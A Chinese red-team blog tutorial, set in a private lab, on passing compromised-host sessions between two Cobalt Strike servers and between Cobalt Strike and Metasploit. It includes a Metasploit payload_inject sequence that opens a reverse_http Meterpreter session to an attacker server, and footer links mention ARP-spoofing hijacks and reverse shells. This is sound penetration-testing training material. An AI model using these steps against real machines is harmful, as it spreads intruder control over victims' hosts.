内网渗透神器CobaltStrike之会话管理(五)

已于 2023-08-21 21:34:51 修改
阅读量464 收藏 1
点赞数
分类专栏: 红队的自我修养 文章标签: 安全 网络安全 渗透测试 web安全
于 2022-11-21 16:06:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/127966848
版权

CS之间派生会话

将CS1管理的会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)CS TeamServer2
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

首先用CS客户端连接两个不同的CS服务器, 而我们要做的是将CS1的会话派生到CS2中去

image-20221005225524757


在CS2服务器和CS1服务器都新建一个同样配置的监听用于接收派生过来的会话, 监听的host地址要填写为CS2服务器ip地址

image-20221005225938081

image-20221005230525306


派生会话选择上述建立的监听, 随后切换至连接CS2服务器的客户端查看派生过来的主机

动画

1


CS派生会话至metasploit

将CS服务器的会话派生至metasploit中, 方便进行漏洞攻击


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)metasploit
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

进入kali2输入命令:msfconsole, 运行metasploit

image-20221005234248726


metasploit新建监听用于接收CS派生过来的会话

image-20221006153754571


返回至CS服务器建立外部监听, payload选择Foreign HTTP, 其余内容与metasploit建立的监听一致

image-20221006153852260


派生会话选择上述建立的外部监听t, 然后返回Metasploit查看上线情况

动画


metasploit派生会话至CS

将metasploit管理的会话派生至CS服务器


准备环境

主机描述
Kali(192.168.47.134)CS TeamServer1
Kali2(192.168.47.144)metasploit
Windows7(192.168.47.133)CS客户端,攻击机
Windows7(192.168.47.141)受害机

操作步骤

首先查看MSF中需派生会话的ID, 输入命令: sessions, 此处要派生的会话ID为6 (下面的截图截错了)

image-20221006163339205


输入如下命令进行派生会话, 派生完成后返回会话的进程PID为3322

use exploit/windows/local/payload_inject  

set payload windows/meterpreter/reverse_http

set lhost 192.168.47.134

set lport 80

set disablepayloadhandler True  //默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true

set session 6

exploit

image-20221006173316522


返回CS查看上线的会话 (PID:3332)

image-20221006173808452

Henry404s
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
内网会话劫持
weixin_30734435的博客
07-11 249
会话劫持 环境:一台kali虚拟机(攻击者,IP:192.168.41.140) 一台win7虚拟机(用户,IP:192.168.41.129) 网关IP:192.168.41.2 第一步 使用nmap扫描局域网内活动的主机,确定攻击目标,这里的192.168.41.129就是要进行劫持的目标。 第二步 使用arpspoof命令进行arp欺骗攻击。 先打开kali的转发功能,否则用户端不能正常上...
会话劫持 --内网无敌
xiaotu0821的博客
04-05 2000
会话劫持-登陆别人的百度贴吧1.      arp欺骗2.      wireshark  –抓包抓到想要的数据包后保存,后缀为pacp3.      ferret   --重新生成抓包后的文件然后使用 ferret –r 上面抓包保存的文件xx.pacp成功后将生成一个新文件hamster.txt4.      hamster  --重放流量该软件会要求修改代理及端口访问该地址及端口5.    ...
udp内网简单聊天实现
Yama的博客
11-01 136
udp内网聊天 udp 发送 # 1. socket import socket # 2. 创建一个socket对象 socket.AF_INET 网络协议 udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # 3. 确认要发送的ip和端口 dest_addr = ('10.254.7.181',10000) # 4. 确认发送内容 转码 text = "hello world".encode('utf-8') # 5. 发
Cobalt Strike会话管理
qq_56426046的博客
09-20 1064
测试环境系统服务ipteamservermetasploitvictimvictim。
[钴击]Cobalt Strike内网渗透工具
qq_60115503的博客
09-04 1301
1.添加新的Cobalt Strik团队服务器2.删除当前的Cobalt Strik团队服务器3.新建一个监听器4.切换图形化会话按钮5.切换列表话会话按钮6.以列表方式显示目标7.密码凭证栏按钮8.下载文件列表9.键盘记录表10.屏幕截图表11.生成windows下可执行木马12.生成java签名的applet攻击13.生成office宏攻击14.生成powershell后门15.文件托管按钮16.管理web站点17.帮助文档18.关于。
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start...
内网渗透神器fscan扫描工具
12-04
Windows下安装fscan扫描工具下载go环境;...go build -ldflags使用说明简单用法fscan.exe -h 192.168.1.1/24 (默认使用全部模块)fscan.exe -h 192.168.1.1/16 (B段扫描)其他用法fscan.exe -h 192.168.1.1/24 -np -no -...
Cobalt Strike 4.5 中英版本一键切换,内置插件
11-18
Cobalt Strike 4.5 内网渗透神器,中英一键切换。免费分享
内网横向渗透神器-CS
qq_39756628的博客
06-22 2361
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
内网渗透CobaltStrikeCS
Welcome To Myon'Blog !
01-10 1579
Cobalt Strike是一款内网渗透测试工具,常被业界人称为CSCobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。客户端模式和服务端模式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有可能会出现一些细小的问题不过影响不大。
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1058
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
内网渗透-cobaltstrikecs上线获取shell
lza20001103的博客
04-30 6569
cobaltstrikecs上线获取shell
团队协同作战渗透工具 CS神器Cobalt Strike
热门推荐
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS神器,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)
红队内网渗透神器--CobaltStrike安装教程
Aluxian_的博客
11-15 8362
CobaltStrike是一款渗透测试神器,被业界人称为CS神器CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
安全+大模型应用系列之RSAC的Dropzone AI的分析
si1ence的博客
05-17 398
从Dropzone AI广泛的认可度来看,国外对该思路的认可度较好,前期在国内项目验证的时候客户也非常感兴趣。但是目前国内的安全产品、安全平台较为封闭、无法像国外产品能够广泛直接对接、或许是当前制约国内的安全GPT广泛推广的一个阻碍; 安全+大模型的产品的逐渐按照多能力的安全专家(全能)的能力和价值去规划、应该是一个受客户认可的正确方向。
Nginx - 安全基线配置与操作指南
小工匠
05-19 915
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
最新发布
rolt的专栏
05-21 665
然后再针对这个画一个块内部图,然后这里再把签名拖上去
cobalt strike4.4
11-08
Cobalt Strike 4.4是一款专业的渗透测试工具,由Strategic Cyber LLC开发。它广泛被安全研究人员、红队和渗透测试人员使用,以评估网络安全的弱点和漏洞。 Cobalt Strike 4.4提供了各种功能和技术,包括钓鱼攻击、漏洞利用、社会工程学攻击和内网渗透等。它模拟了真实的攻击场景,能够帮助安全专家发现和修复网络中的安全问题。 其中,钓鱼攻击是Cobalt Strike 4.4的一个重要特性。它通过伪造电子邮件、网站和文件,诱使用户输入敏感信息,例如用户名、密码和信用卡信息。这可用于测试员评估目标组织员工的安全意识和行为。 Cobalt Strike 4.4还支持漏洞利用,用于发现和利用系统和应用程序的漏洞。这些漏洞可能导致入侵者获取未授权的访问权限,从而进一步探索和操纵目标网络。 社会工程学攻击是利用人的弱点和错误来获得机密信息的手段。Cobalt Strike 4.4中的社会工程学攻击模块可通过发送钓鱼电子邮件、制造假网站和执行欺骗性操作,诱使目标用户泄露敏感信息。 内网渗透Cobalt Strike 4.4的另一个重要功能。它模拟渗透攻击者在目标网络中的行为,尝试获取横向权限并访问受限资源。通过内网渗透渗透测试人员可以评估网络安全的脆弱点,并提出相应的解决方案来提高网络的防御能力。 总之,Cobalt Strike 4.4是一款功能强大的渗透测试工具,具有广泛的应用领域。它通过模拟攻击场景,帮助安全专家评估和提高网络安全性,保护组织免受潜在的网络攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值